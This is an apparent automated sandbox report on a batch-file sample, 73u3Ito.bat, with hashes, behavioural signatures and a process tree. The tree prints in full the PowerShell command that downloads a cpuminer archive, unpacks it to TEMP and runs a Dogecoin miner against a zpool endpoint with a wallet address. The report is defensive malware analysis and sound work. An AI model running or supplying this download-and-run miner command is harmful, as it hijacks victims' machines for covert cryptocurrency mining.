Analysis
  max time kernel: 1798s
  max time network: 1807s
  platform: windows10-2004_x64
  resource: win10v2004-20231215-ja
  resource tags: arch:x64, arch:x86, image:win10v2004-20231215-ja, locale:ja-jp, os:windows10-2004-x64, system, windows
  submitted: 04/02/2024, 14:57
Static task
  static1
Behavioral task
  behavioral1
    Sample: 73u3Ito.bat
    Resource: win10-20231215-ja
Behavioral task
  behavioral2
    Sample: 73u3Ito.bat
    Resource: win10v2004-20231215-ja
General
  Target: 73u3Ito.bat
  Size: 499B
  MD5: fe74bff27516829a88cfbc6f6e99646f
  SHA1: 0c15d859211c79910b277d07e729bec7197a60cd
  SHA256: b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
  SHA512: a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98
Signatures
  Blocklisted process makes network request (2 IoCs)
    flow   pid   Process
    9      4264  powershell.exe
    14     4264  powershell.exe
  Executes dropped EXE (1 IoC)
    pid   Process
    1352  cpuminer-sse2.exe
  Loads dropped DLL (5 IoCs)
    pid   Process
    1352  cpuminer-sse2.exe  (5 DLL loads, all by this process)
  Suspicious behavior: EnumeratesProcesses (2 IoCs)
    pid   Process
    4264  powershell.exe
    4264  powershell.exe
  Suspicious use of AdjustPrivilegeToken (1 IoC)
    description              pid   Process
    Token: SeDebugPrivilege  4264  powershell.exe
  Suspicious use of WriteProcessMemory (6 IoCs)
    description                       pid   Process         procid_target
    PID 5404 wrote to memory of 4264  5404  cmd.exe         84
    PID 5404 wrote to memory of 4264  5404  cmd.exe         84
    PID 4264 wrote to memory of 5644  4264  powershell.exe  94
    PID 4264 wrote to memory of 5644  4264  powershell.exe  94
    PID 5644 wrote to memory of 1352  5644  cmd.exe         95
    PID 5644 wrote to memory of 1352  5644  cmd.exe         95
Processes
  [1] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
      PID: 5404
      - Suspicious use of WriteProcessMemory
    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
        PID: 4264
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      [3] C:\Windows\system32\cmd.exe
          Command line: "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
          PID: 5644
          - Suspicious use of WriteProcessMemory
        [4] C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
            Command line: cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
            PID: 1352
            - Executes dropped EXE
            - Loads dropped DLL
Downloads